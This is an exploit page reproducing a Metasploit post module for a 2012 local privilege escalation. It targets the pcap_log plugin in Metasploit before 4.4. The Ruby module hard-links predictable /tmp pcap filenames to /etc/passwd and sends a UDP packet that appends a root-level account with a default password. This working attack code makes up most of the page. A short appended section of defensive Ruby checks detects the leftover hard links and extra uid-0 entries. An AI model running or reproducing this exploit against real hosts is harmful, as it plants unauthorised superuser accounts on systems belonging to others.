Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit
Source: http://www.metasploit.com  Author: metasploit  Published: 2012-10-15

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/priv'
require 'msf/core/exploit/local/linux_kernel'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/local/unix'

load 'lib/msf/core/post/common.rb'
load 'lib/msf/core/post/file.rb'
load 'lib/msf/core/exploit/local/unix.rb'
load 'lib/msf/core/exploit/local/linux.rb'

class Metasploit3 < Msf::Post
 Rank = ExcellentRanking

 include Msf::Post::File
 include Msf::Post::Common

 include Msf::Exploit::Local::Linux
 include Msf::Exploit::Local::Unix

 def initialize(info={})
  super( update_info( info, {
    'Name'   => 'Metasploit pcap_log Local Privilege Escalation',
    'Description'   => %q{
     Metasploit < 4.4 contains a vulnerable 'pcap_log' plugin which, when used with the default settings,
     creates pcap files in /tmp with predictable file names. This module exploits this by hard-linking these
     filenames to /etc/passwd, then sending a packet with a privileged user entry contained within.
     This, and all the other packets, are appended to /etc/passwd.

     Successful exploitation results in the creation of a new superuser account.

     This module requires manual clean-up - remove /tmp/msf3-session*pcap files and truncate /etc/passwd.
    },
    'License'       => MSF_LICENSE,
    'Author' => [ '0a29406d9794e4f9b30b3c5d6702c708'],
    'Platform'      => [ 'linux','unix','bsd' ],
    'SessionTypes'  => [ 'shell', 'meterpreter' ],
    'References'    =>
     [
      [ 'BID', '54472' ],
      [ 'URL', 'http://0a29.blogspot.com/2012/07/0a29-12-2-metasploit-pcaplog-plugin.html'],
      [ 'URL', 'https://community.rapid7.com/docs/DOC-1946' ],
     ],
    'DisclosureDate' => "Jul 16 2012",
    'Targets'       =>
     [
      [ 'Linux/Unix Universal', {} ],
     ],
    'DefaultTarget' => 0,
   }
   ))
   register_options(
   [
    Opt::RPORT(2940),
    OptString.new("USERNAME", [ true, "Username for the new superuser", "metasploit" ]),
    OptString.new("PASSWORD", [ true, "Password for the new superuser", "metasploit" ])
   ], self)
 end

 def run
  print_status "Waiting for victim"
  initial_size = cmd_exec("cat /etc/passwd | wc -l")
  i = 60
  while(true) do
   if (i == 60)
    # 0a2940: cmd_exec is slow, so send 1 command to do all the links
    cmd_exec("for i in $(seq 0 120); do ln /etc/passwd /tmp/msf3-session_`date --date=\"\$i seconds\" +%Y-%m-%d_%H-%M-%S`.pcap ; done")
    i = 0
   end
   i = i+1
   if (cmd_exec("cat /etc/passwd | wc -l") != initial_size)
    # PCAP is flowing
    pkt = "\n\n" + datastore['USERNAME'] + ":" + datastore['PASSWORD'].crypt("0a") + ":0:0:Metasploit Root Account:/tmp:/bin/bash\n\n"
    print_status("Sending file contents payload to #{session.session_host}")
    udpsock = Rex::Socket::Udp.create(
    {
     'Context' => {'Msf' => framework, 'MsfExploit'=>self}
    })
    udpsock.sendto(pkt, session.session_host, datastore['RPORT'])
    break
   end
   sleep(1)
  end

  if cmd_exec("(grep Metasploit /etc/passwd > /dev/null && echo true) || echo false").include?("true")
   print_good("Success. You should now be able to login or su to the 'metasploit' user with password 'metasploit'.")
  else
   print_error("Failed. You should manually verify the 'metasploit' user has not been added")
  end
  # 0a2940: Initially the plan was to have this post module switch user, upload & execute a new payload
  #   However because the session is not a terminal, su will not always allow this.
 end
end
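Added defensive example (not part of the module above or of Metasploit): two checks an administrator can run against the artefacts this attack leaves behind, namely hard links in /tmp that share an inode with /etc/passwd, and any uid-0 entry in a passwd file besides root. SAMPLE_PASSWD is constructed data.

```ruby
require 'tmpdir'

# Added example, not part of the module: detect the two traces of the
# pcap_log hard-link attack.
#
# 1. Hard links in a temp directory that share device and inode with a
#    sensitive file. The module names them /tmp/msf3-session_<ts>.pcap,
#    but comparing inodes catches any name.
# 2. Extra uid-0 entries in a passwd file, which the appended
#    "<user>:<hash>:0:0:..." line produces.

# Paths in tmp_dir that are hard links to target (same dev and ino).
# File.lstat does not follow symlinks, so a symlink to target is not
# reported; only a genuine second name for the inode is.
def hardlinks_to(target, tmp_dir)
  tstat = File.stat(target)
  Dir.children(tmp_dir).map { |n| File.join(tmp_dir, n) }.select do |p|
    s = File.lstat(p)
    s.file? && s.dev == tstat.dev && s.ino == tstat.ino
  end.sort
end

# Usernames of every uid-0 entry in passwd text other than root.
# Blank and malformed lines (the pcap bytes around the injected entry)
# are ignored, which is how the C library parser treats them as well.
def extra_root_accounts(passwd_text)
  passwd_text.each_line.each_with_object([]) do |line, found|
    fields = line.chomp.split(':', -1)
    next unless fields.length == 7
    name, _pw, uid = fields
    found << name if uid == '0' && name != 'root'
  end
end

# Constructed passwd content: legitimate root, a normal user, some
# pcap noise (null bytes stand in for the header), and an injected entry
# of the kind the module sends.
SAMPLE_PASSWD = "root:x:0:0:root:/root:/bin/bash\n" \
                "alice:x:1000:1000:Alice:/home/alice:/bin/bash\n" \
                "\x00\x00\x00\x00junk\n\n" \
                "metasploit:0aXYZ:0:0:Metasploit Root Account:/tmp:/bin/bash\n"

if __FILE__ == $0
  puts "uid-0 accounts besides root: #{extra_root_accounts(SAMPLE_PASSWD).inspect}"
  puts "hard links to /etc/passwd in /tmp: #{hardlinks_to('/etc/passwd', '/tmp').inspect}"
end
```

Running the script on a live host reports which /tmp entries are hard links to /etc/passwd and which passwd lines grant uid 0; both lists should be empty on a clean system.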